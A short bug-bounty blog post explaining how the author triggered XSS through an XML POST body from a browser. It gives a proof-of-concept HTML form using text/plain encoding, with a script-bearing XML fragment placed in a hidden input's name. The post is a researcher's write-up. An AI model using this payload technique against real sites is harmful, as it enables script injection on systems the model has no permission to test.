UK Security Researcher
A site containing various blog posts, tutorials, tools and information regarding working with me.
XML XSS via POST
Read more blogs on BugBountyForum
I was bug hunting on a site which looked like this:
POST /snip/snippet.php HTTP/1.1
I tested in BURP for XSS in XML, and it worked. Now I have to get this to work via a browser. I was a bit stuck of sending XML in a HTML form POST and google didn’t yeild me any results, but I worked out how. Below is my PoC:
<html> <body> <form ENCTYPE="text/plain" action="http://vulnsite.com/snip/snippet.php" method="post">
<input type="hidden" name="<foo> <html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script>alert(1);</html:script> </html> </foo>">
<input type="submit" value="submit"> </form>
Upon pressing “Submit”, the XSS in the XML is sent, and executes. And there we have it.. XSS in a XML post via a HTML form. Turns out adding the input name as the XSS will allow it to be executed.
Note: Turns out all endpoints on the target site are vulnerable to this.. they’re going to have fun patching this. ;)